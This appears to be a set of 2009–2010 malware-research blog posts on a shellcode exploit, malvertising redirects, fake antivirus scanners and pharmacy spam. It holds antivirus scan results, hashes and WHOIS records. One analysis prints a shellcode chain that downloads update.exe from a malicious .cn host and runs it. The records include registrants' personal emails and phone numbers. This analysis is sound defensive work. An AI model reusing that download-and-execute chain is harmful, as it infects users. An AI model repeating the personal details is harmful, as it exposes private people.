Symantec 1.4.4.12 2009.09.15 -
TheHacker 6.3.4.4.404 2009.09.15 -
TrendMicro 8.950.0.1094 2009.09.15 -
VBA32 3.12.10.10 2009.09.14 -
ViRobot 2009.9.15.1936 2009.09.15 -
VirusBuster 4.6.5.0 2009.09.14 -
The loading method and ActionScript code are identical to those of the Flash file discovered at bintus-bahi.cn. Again several arrays were used to obfuscate the code.
File evenSearchLooks.png received on 2009.09.15 07:40:31 (UTC)

File size: 211 bytes
MD5: 3cf6404d1251a2ecf132a764d94df3f5
SHA1: d89c7e2ccb851010dbe431688b49f873716cdd0e
SHA256: 6581b25e34e1bcbc70bf78f075e8cafd0e7a17744b16b48a943562b8c6ba3a2f
PEiD: -
Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.15 -
AhnLab-V3 5.0.0.2 2009.09.15 -
AntiVir 7.9.1.14 2009.09.14 -
Antiy-AVL 2.0.3.7 2009.09.15 -
Authentium 5.1.2.4 2009.09.15 -
Avast 4.8.1351.0 2009.09.14 -
AVG 8.5.0.412 2009.09.14 -
BitDefender 7.2 2009.09.15 -
CAT-QuickHeal 10.00 2009.09.14 -
ClamAV 0.94.1 2009.09.14 -
Comodo 2323 2009.09.15 -
DrWeb 5.0.0.12182 2009.09.15 -
eSafe 7.0.17.0 2009.09.14 -
eTrust-Vet 31.6.6737 2009.09.14 -
F-Prot 4.5.1.85 2009.09.14 -
F-Secure 8.0.14470.0 2009.09.15 -
Fortinet 3.120.0.0 2009.09.15 -
GData 19 2009.09.15 -
Ikarus T3.1.1.72.0 2009.09.15 -
Jiangmin 11.0.800 2009.09.15 -
K7AntiVirus 7.10.844 2009.09.14 -
Kaspersky 7.0.0.125 2009.09.15 -
McAfee 5741 2009.09.14 -
McAfee+Artemis 5741 2009.09.14 -
McAfee-GW-Edition 6.8.5 2009.09.15 -
Microsoft 1.5005 2009.09.15 -
NOD32 4425 2009.09.14 -
Norman 6.01.09 2009.09.14 -
nProtect 2009.1.8.0 2009.09.14 -
Panda 10.0.2.2 2009.09.14 -
PCTools 4.4.2.0 2009.09.14 -
Prevx 3.0 2009.09.15 -
Rising 21.47.11.00 2009.09.15 Hack.Exploit.Win32.CVE-2008-0015.a
Sophos 4.45.0 2009.09.15 -
Sunbelt 3.2.1858.2 2009.09.15 -
Symantec 1.4.4.12 2009.09.15 -
TheHacker 6.3.4.4.404 2009.09.15 -
TrendMicro 8.950.0.1094 2009.09.15 -
VBA32 3.12.10.10 2009.09.14 -
ViRobot 2009.9.15.1936 2009.09.15 -
VirusBuster 4.6.5.0 2009.09.14 -
In the obfuscated code we do find back a reference to evenSearchLooks.png.
Once cleaned up, the code already looks way clearer.
Our evenSearchLooks.png is not a valid PNG image. It looks more like an invalid media file header that runs the shellcode.
Firefox is unable to display the image; this does not necessarily mean that Firefox users are immune to this exploit.
Shellcode.

The shellcode is one long string in the value property of a DIV element:
It is extracted using getElementById with a regular expression (regex) applied to remove the junk characters. Once cleaned up it gives escaped unicode. After getting appropriate function addresses from kernel32.dll and urlmon.dll, the code does this:

CODE
call URLDownloadToFileA
hxxp://ccikudor.cn/qweqwe/update.php?id=1
[user temp]\update.exe

call WinExec
[user temp]\update.exe

call URLDownloadToFileA
(hex: 9090)
[user temp]crash.php

call WinExec
[user-temp]\crash.php

The second URLDownloadToFileA has an invalid parameter but would work if they had provided a second URL. My network traces don't have any traces of crash.php

IP details


fastreadingit.ru - 211.95.78.98

type: CORPORATE
nserver: ns1.everydns.net - ns2.everydns.net - ns3.everydns.net - ns4.everydns.net
person: Private person
phone: +7 910 3478712
e-mail: dmitrijstanislavskij@yandex.ru
registrar: REGRU-REG-RIPN
created: 2009.09.04
paid-till: 2010.09.04
______________________________

add-content-filter.info / 7addition.info / 71speed.info - NO IP

Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. dba PublicDomainRegistry.com (R159-LRMS)
Registrant Name:Vicky Chan
Registrant Street1:Flat C, 18/F., Block 39
Registrant City:Hong Kong
Registrant State/Province:Hong Kong
Registrant Postal Code:1007
Registrant Country:CN
Registrant Phone:+852.97336022
Registrant Email:chan.wai.kay.1@gmail.com
______________________________

add-block-filter.info - 212.117.163.165

Created On:15-Mar-2009 18:49:45 UTC
Last Updated On:15-May-2009 03:27:23 UTC
Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. dba PublicDomainRegistry.com (R159-LRMS)
Name Server:NS1.ADD-BLOCK-FILTER.INFO - NS2.ADD-BLOCK-FILTER.INFO
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Email:contact@privacyprotect.org

______________________________

hospitalhotspot.com - 213.163.91.205

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.CODDNS.COM - NS2.CODDNS.COM
Creation Date: 20-aug-2009

Registrant: Andrew (andrewfairg@yahoo.co.uk)
Unit A1 The Workshops
London
London,W12 9DP
GB
Tel. +44.2087437597
______________________________

kzayopoq.cn / ccikudor.cn - 195.88.191.46

Registrant Organization: 海盐新明制造厂
Registrant Name: 张群
Administrative Email: ujangn@126.com
Sponsoring Registrar: 易名中国
Name Server:ns1.vvukufan.com - ns2.vvukufan.com
Registration Date: 2009-09-10 21:39
Expiration Date: 2010-09-10 21:39

Special thanks fly out to antnet for assisting me with the javascript / Shellcode
Kimberly

the-eagles.cn - 94.102.48.29


A small update on The New York Times malvertizement attack from last weekend.

After sex-in-the-city.cn and russell-brand.cn we now have the-eagles.cn. From there we are redirected to 6cleanspyware.com.
IPB Image
Like everyone else I have been reading the different reports about the incident at the New York Times and let me get one thing straight: the bad guys don't swap or replace ads with bad ones, neither do they inject code in streams.

They rather add code to an existing page or activate a new webpage when the malvertizements go live, if the banner itself is not a malicious Flash file. But it's so easy and convenient though to say my ads have been "poisoned" or whatever instead of admitting that your advertisement department screwed up in the first place by not performing security checks on everything.

the-eagles.cn - 94.102.48.29

Created: 2009-09-11
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns3.freedns.ws - ns4.freedns.ws - ns1.freedns.ws - ns2.freedns.ws

hostnames sharing ip with a-records

adeptofmastery.cn | antivirusscannerv9.com | bestpersonalprotectionv7.com | beststarwars.cn | bulkdvdreader.cn | fastvirusscanv6.com | firstspywarescannerv1.com | govirusscanner.com | onlineantispywarescanv6.com | onlinebestscannerv3.com | onlinepersonalscanner.com | onlineproantivirusscan.com | personalfolderscanv2.com | personalonlinescanv3.com | private-antivirus-scannerv2.com | russell-brand.cn | secure-antispyware-scanv3.com | securefolderscannerv6.com | sex-and-the-city.cn | sitemechanics.cn | space2009city.cn | spyware-scannerv2.com | teacherslounge.cn | totalsecurityscannerv3.com | we-accepted.cn | willsmithinc.cn

6cleanspyware.com - 206.217.201.136

Created: 2009-09-16
Name Server:ns3.freedns.ws - ns4.freedns.ws - ns1.freedns.ws - ns2.freedns.ws
Name: Pery Z Jenny
Organization: n/a
Address: Xian CITS. 48 Changan Road
City: Xian
Province/state: Xian
Country: CN
Postal Code: 710061
Phone: +8.6298522311
Fax: +8.6298522311
Kimberly

Clicksor Interstitial Advert leads to malware


A Clicksor Interstitial Advert is currently redirecting people to a fake online scanner hosted at online-defense7.com. Back on Apr 26 2008 I blogged about a similar incident.
IPB Image
Note: Don't click on the fake warnings, they trigger a file download. Just click the skip this ad button.

A closer look at the source code shows us which links we need to follow in our network capture to track down all the websites involved in the browser hijack / redirect.
IPB Image
The network capture reveals that we are redirected to adrpxts.com.
IPB Image
The requested page contains some escaped code which immediately should ring a bell btw if you see / read this as an advertiser.
IPB Image
Below are the corresponding unescaped strings.
IPB Image
A-Install-c8d161_2001-8.exe

File size: 177664 bytes
MD5...: 7fa31700cd671c2e9498cb04ebf987a5
SHA1..: 1443bf8eb3a443d9abe5677372021c1d38f6e7f8
SHA256: 4929b356f751f04017daf92251d0e597ebeed06fe662b6f9ddb793103522850f
PEiD..: -
QUOTE
File A-Install-c8d161_2001-8.exe received on 2009.11.05 12:19:32 (UTC)
a-squared 4.5.0.41 2009.11.05 -
AhnLab-V3 5.0.0.2 2009.11.05 -
AntiVir 7.9.1.53 2009.11.05 -
Antiy-AVL 2.0.3.7 2009.11.05 -
Authentium 5.2.0.5 2009.11.05 -
Avast 4.8.1351.0 2009.11.05 -
AVG 8.5.0.423 2009.11.05 -
BitDefender 7.2 2009.11.05 -
CAT-QuickHeal 10.00 2009.11.05 -
ClamAV 0.94.1 2009.11.05 -
Comodo 2848 2009.11.05 -
DrWeb 5.0.0.12182 2009.11.05 -
eTrust-Vet 35.1.7103 2009.11.04 -
F-Prot 4.5.1.85 2009.11.04 -
F-Secure 9.0.15370.0 2009.11.04 -
Fortinet 3.120.0.0 2009.11.05 -
GData 19 2009.11.05 -
Ikarus T3.1.1.74.0 2009.11.05 -
Jiangmin 11.0.800 2009.11.05 -
K7AntiVirus 7.10.888 2009.11.04 -
Kaspersky 7.0.0.125 2009.11.05 -
McAfee 5792 2009.11.04 -
McAfee+Artemis 5792 2009.11.04 -
McAfee-GW-Edition 6.8.5 2009.11.05 -
Microsoft 1.5202 2009.11.05 -
NOD32 4575 2009.11.05 a variant of Win32/Kryptik.AWY
Norman 6.03.02 2009.11.05 -
nProtect 2009.1.8.0 2009.11.05 -
Panda 10.0.2.2 2009.11.04 -
PCTools 7.0.3.5 2009.11.05 -
Prevx 3.0 2009.11.05 -
Rising 21.54.33.00 2009.11.05 -
Sophos 4.47.0 2009.11.05 -
Sunbelt 3.2.1858.2 2009.11.05 -
Symantec 1.4.4.12 2009.11.05 -
TheHacker 6.5.0.2.061 2009.11.05 -
TrendMicro 9.0.0.1003 2009.11.05 -
VBA32 3.12.10.11 2009.11.04 -
ViRobot 2009.11.5.2023 2009.11.05 -
VirusBuster 4.6.5.0 2009.11.04 -
Links
adrpxts.com/cmp/click.php?id=[*]
adrpxts.com/cmp/scr.php?a=11&lang=en-us&id=[*]&ref=[*]
wamericana.cn/go.php?id=[*]&key=[*]&p=[*]
online-defense7.com/2/?sess=[*]
adrpxts.com - 213.175.211.76

Registrar: BIZCN.COM, INC.
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Updated Date: 27-aug-2009
Creation Date: 27-aug-2009

Registrant Contact:
Privat person
Mark Hollis info@azerllc.com
+1301723412 fax: +1301723412
412 17th Street, Suite 412
Denver CO 80202
us

hostnames sharing ip with a-records

adagenetwork.com | advertisefront.com | aeroadscampaigns.com | cheezheadmedia.com | chronoad.com | classifiedclicksor.com | corpusaads.com | coworkingads.com | creativebulkads.com | jetlevelads.com | pinayforclicks.com | sciencebizads.com | socialverclick.com

wamericana.cn - 94.102.58.252

ROID: 20091101s10001s72359905-cn
Administrative Email: padovano@BeachTrip.se
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Registration Date: 2009-11-01 18:56
Expiration Date: 2010-11-01 18:56

inetnum: 94.102.57.0 - 94.102.59.255
netname: NL-ECATEL
descr: ECATEL LTD
descr: Dedicated servers
country: NL

hostnames sharing ip with a-records

green-pepper.cn | humpback2009.cn | malware-url.com | planterstyle.cn | weddingcake2009.cn

online-defense7.com - 89.248.168.20 - 89.248.162.147

Registrar: TODAYNIC.COM, INC.
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Updated Date: 04-nov-2009
Creation Date: 04-nov-2009

Queried whois.todaynic.com with "online-defense7.com"...
Query error: TimedOut

inetnum: 89.248.168.0 - 89.248.168.255
netname: NL-ECATEL
descr: AS29073, Ecatel LTD
country: NL

hostnames sharing ip with a-records

006antivirus.com | be-secured2.com | get-secure2.com | installprotection2.com | scan-spyware2.com | winscanner01.com | winscanner18.com | your-protection8.com
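The escaped code in the adrpxts.com page is the kind of thing an analyst decodes by hand from a capture. As an added example (not code from the original post), here is a small Python helper that mimics JavaScript's legacy unescape() (both %XX and %uXXXX forms), pulls the hostnames out of the decoded text and flags the hidden-iframe pattern; the escaped sample is constructed for this example and only reuses domains already named in the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample, modelled on the escaped blob described above (NOT the
# actual captured code): an unescape()+document.write pattern hiding an iframe
# and a location redirect to the next hops of the redirect chain.
SAMPLE_ESCAPED = (
    "%3Ciframe%20src%3D%22http%3A%2F%2Fwamericana.cn%2Fgo.php%3Fid%3D123%26key%3Dabc"
    "%26p%3D1%22%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fiframe%3E"
    "%u003Cscript%u003Elocation.href%u003D%u0027http://online-defense7.com/2/?sess=xyz"
    "%u0027%u003C/script%u003E"
)

# JavaScript unescape() decodes %uXXXX (UTF-16 code unit) and %XX; anything
# else, including a stray '%', is left untouched.
_ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(s: str) -> str:
    """Decode a string the way JavaScript's legacy unescape() would."""
    def repl(m):
        code = m.group(1) or m.group(2)
        return chr(int(code, 16))
    return _ESC_RE.sub(repl, s)


_URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def extract_hosts(decoded: str) -> list:
    """Return the unique hostnames referenced by URLs in the decoded text, in order."""
    hosts = []
    for url in _URL_RE.findall(decoded):
        host = urlparse(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def has_hidden_iframe(decoded: str) -> bool:
    """Flag an <iframe> with a 0 or 1 pixel width/height, typical of malvertising pages."""
    return re.search(r"<iframe[^>]*(width|height)=[\"']?[01][\"']?", decoded, re.I) is not None


if __name__ == "__main__":
    decoded = js_unescape(SAMPLE_ESCAPED)
    print(decoded)
    print("hosts:", extract_hosts(decoded))
    print("hidden iframe:", has_hidden_iframe(decoded))
```

Run it over the escaped portion of a captured page and the host list gives you the next links to follow in the network capture.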
Kimberly
Today while doing some research on the Google Trends and BlackHat SEO I ran into a redirect using a Flash file again. We will use surfseek.net/menu.swf as an example for our analysis.
In the network capture we can see that 2 flash vars are being defined. We are interested in the var called "l", which seems to be nothing else than garbage.
IPB Image
When we analyse the action script we see that they wrote a string replace function and once decoded we obtain surfseek.net/search.php?q=jaimee+grubbs+pics and getURL is then used to load the decoded link.
IPB Image
It is the first time though that I see the flash file as a referer in the network capture ...
IPB Image
Kimberly
The Canadian Pharmacy is the number one affiliate program for spammers. They are often referred to as Spamit & Glavmed. For those interested, may I suggest the following interesting reading:

From.

Your own email address.

Subject.
  • Get bone-on that lasts
  • Cultivate your male energy
  • Your male hormonal boost
  • Feel excitement of love again
  • Hottest selling tips on net
  • See Britney n'ked
Body.
  • What deals on remedies have we prepared for you?
    We have 30%, 40% and even 60% off, depending on what exact solution from our 400-name spectrum you may want.
    Buy and get your package via airmail or messenger service to your door!
    img46.imageshack.us/img46/4050/pallotto.swf

  • Overpriced medicants are sold everywhere; cures on super prices are sold in our store!
    Big selection of branded solutions for managing viruses and anxiety, hypertension and male vigor problems, fungi and many more illnesses!
    Choose this online-store and you will never overpay
    img94.imageshack.us/img94/627/freilino.swf

  • Something like viruses or allergy bothers your normal life?
    With our portal you will get rid of such problems problems fast!
    Click, find and buy!
    With our wide selection of brands and lowered prices you will always be a satisfied buyer!
    img714.imageshack.us/img714/1056/jeska.swf

  • Something like viruses or other infections disturbs your normal life?
    With our store you will remove problems fast!
    Click, find and purchase!
    With our wide variety of products and lowered prices you will always be a satisfied purchaser!
    img192.imageshack.us/img192/1740/hussian.swf

  • Overpriced remedies are sold everywhere; cures on good prices are sold here!
    Wide range of brands for fighting viruses and stress, high blood pressure and male vigor problems, fungi and many more illnesses!
    Choose this online-portal and you will never overpay
    img716.imageshack.us/img716/3880/ryburn.swf

  • There are many stores on the Web, ready to bring medicants to your house, but only we offer:
    -Confidential packing and your prescription is not the thing we need to see!
    -Low prices on branded pilules!
    -Lots of hot deals all February!
    It's easy to purchase, when there are deals like these!
    img46.imageshack.us/img46/8724/shrewsberry.swf

  • What deals on cures have we prepared for you?
    We have 30%, 40% and even 60% off, depending on what exact solution from our 400-name assortment you may want.
    Buy and get your package via airmail or courier service to your house!
    img192.imageshack.us/img192/6794/quinlin.swf
Mail.
IPB Image
Website.
IPB Image
Flash File.

Nothing special here, the code isn't even obfuscated. The website www.pilldirectwish.com is loaded using getURL and onload. Since the email is in plain text, the website does not load automatically; you have to click on the link.
IPB Image IPB Image
We can trace back its origin to Russia by looking at the font used.
IPB Image
Contact details and orders.

Although the 650 area code belongs to the state of California (CA), the website is hosted in Latvia with Chinese Whois information. Furthermore, when placing an order I never saw a single https request even though the website states that they are using a SECURE order form.
IPB Image

IPB Image

IPB Image
Sounds really trustworthy, doesn't it? Think twice before handing out your credit card, personal details and eventually putting your health at risk.

Virustotal Results

File shrewsberry.swf received on 2010.02.17 10:55:11
Result: 0/39 (0%)

pilldirectwish.com - 188.130.250.230

Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Name Server: NS1.SAMERADIO.COM - NS2.SAMERADIO.COM - NS3.THUSSELL.COM - NS4.THUSSELL.COM
Creation Date: 04-feb-2010

Queried whois.dns.com.cn with "pilldirectwish.com"...

Organisation Name.... zhao jiehai
Organisation Address. xiangyangbeilu6
Organisation Address. dalian
Organisation Address. 116026
Organisation Address. LN
Organisation Address. CN
Admin Email.......... jilaheg@126.com
Admin Phone.......... +86.41188205026
Admin Fax............ +86.41188205026

Queried whois.ripe.net with "-B 188.130.250.230"...

inetnum: 188.130.250.0 - 188.130.251.255
netname: FASTMEDIA-NET
descr: FASTMEDIA - Internet Service Provider
country: LV
admin-c: VL3915-RIPE
tech-c: VL3915-RIPE
status: ASSIGNED PA
mnt-by: FASTMEDIA-MNT
mnt-routes: FASTMEDIA-MNT
mnt-domains: FASTMEDIA-MNT
changed: hostmaster@fasthosting.lv 20091111
source: RIPE

person: Viktors Lihochevs
address: FASTMEDIA SRL
address: O.Kalpaka 68/70
address: LV3400, Latvia
phone: +371 28212172
abuse-mailbox: abuse@fasthosting.lv
e-mail: hostmaster@fasthosting.lv
nic-hdl: VL3915-RIPE
changed: hostmaster@fasthosting.lv 20090727
source: RIPE

my-order-status.info - 195.95.155.16

Sponsoring Registrar:DirectNIC, LTD (R152-LRMS)
Created On:21-Jan-2009 10:45:09 UTC
Last Updated On:04-Jan-2010 08:51:27 UTC
Registrant Name:Direct Privacy LTD Direct Privacy ID 6791C
Registrant Organization:Direct Privacy ID 6791C
Registrant Street1:PO Box 12068
Registrant City:George Town
Registrant State/Province:Grand Cayman
Registrant Postal Code:KY1-1010
Registrant Country:KY
Registrant Phone:+1.13457456022
Registrant Phone Ext.:
Registrant Email:my-order-status.info@directnicprivacy.com